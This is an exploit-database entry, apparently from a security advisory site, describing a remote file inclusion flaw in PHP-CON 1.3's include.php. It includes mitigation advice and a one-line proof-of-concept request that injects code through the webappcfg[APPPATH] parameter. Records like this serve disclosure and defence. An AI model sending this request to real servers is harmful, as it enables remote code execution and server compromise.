header-logo
Suggest Exploit
vendor:
PHP-CON
by:
milw0rm
9.8
CVSS
CRITICAL
Remote File Inclusion
CWE
Product Name: PHP-CON
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP-CON 1.3 – ‘include.php’ Remote File Inclusion

The PHP-CON 1.3 script is vulnerable to remote file inclusion. By manipulating the 'webappcfg[APPPATH]' parameter in the 'include.php' file, an attacker can execute arbitrary code on the server. This can lead to unauthorized access, data leakage, and potential server compromise.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of PHP-CON or apply security measures such as input validation and proper file inclusion techniques.
Source

Exploit-DB raw data:

PHP-CON 1.3 - 'include.php' Remote File Inclusion

Script : http://sourceforge.net/project/showfiles.php?group_id=182182

POC :

/PHP_CON/Exchange/include.php?webappcfg[APPPATH]= Evil Code

# milw0rm.com [2007-11-28]

Navigation

Suggest Exploit

Services By CQR